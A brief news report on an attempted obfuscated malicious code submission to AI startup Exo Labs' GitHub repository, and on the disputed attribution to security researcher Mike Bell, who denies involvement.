Executives at artificial intelligence and machine learning startup Exo Labs reported that an unknown person tried to change the code of their project in the GitHub repository.
Image source: charlesdeluvio / unsplash.com
The code added by an unknown programmer had an innocent-looking header, but to complicate the verification of this fragment, the attacker converted it into a numeric equivalent. When analyzing the code before sending it to the repository, it was discovered that there was an attempt to connect to a server with a known address to download the payload of the first stage of the hack. The payload itself was not found at the specified address – the server returned a “404” error.
After reviewing the incident, researchers discovered that the domain and GitHub accounts associated with the attack pointed to cybersecurity expert Mike Bell from Texas. He denied any involvement in the attack and said it was an attempt to smear his good name. The white hat (ethical) hacker emphasized that there was in fact no payload in the attack scheme, and the corresponding GitHub account was deleted. The attacker also gained access to a domain name belonging to Bell – the expert attributed the incident to the fact that he may have angered someone.